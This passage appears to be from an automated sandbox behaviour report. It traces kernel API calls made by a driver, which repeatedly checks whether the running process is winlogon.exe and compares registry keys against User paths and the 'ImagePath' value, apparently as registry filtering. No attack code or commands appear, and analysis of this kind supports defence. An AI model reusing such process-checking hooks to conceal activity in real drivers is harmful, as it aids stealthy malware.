| ObQueryNameString | Object_ptr = 0xffffc000ba0c0c20, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002aa70c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7d55080, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7d55080, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002aa70fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7d55080, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b7d55080, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002aa70c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b7d55080, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002aa70c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b6a78a30, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b6a78a30, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002aa710d8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b6a78a30, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b6a78a30, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002aa70db8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = 0xffffc000b6a78a30, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002aa70db8, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x2a, ret_val_ptr_out = 0xffffe0003af83eb0 |
| _wcsicmp | _String1 = DhcpInterfaceOptions, _String2 = ImagePath, ret_val_out = -5 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83eb0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #155 (length: 2733, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 2733 |
Processes
»
| Process | Count |
|---|---|
| Process 16 (officeclicktorun.exe, PID: 1740) | 1 |
Sequence
»
| Symbol | Parameters | ||||
|---|---|---|---|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
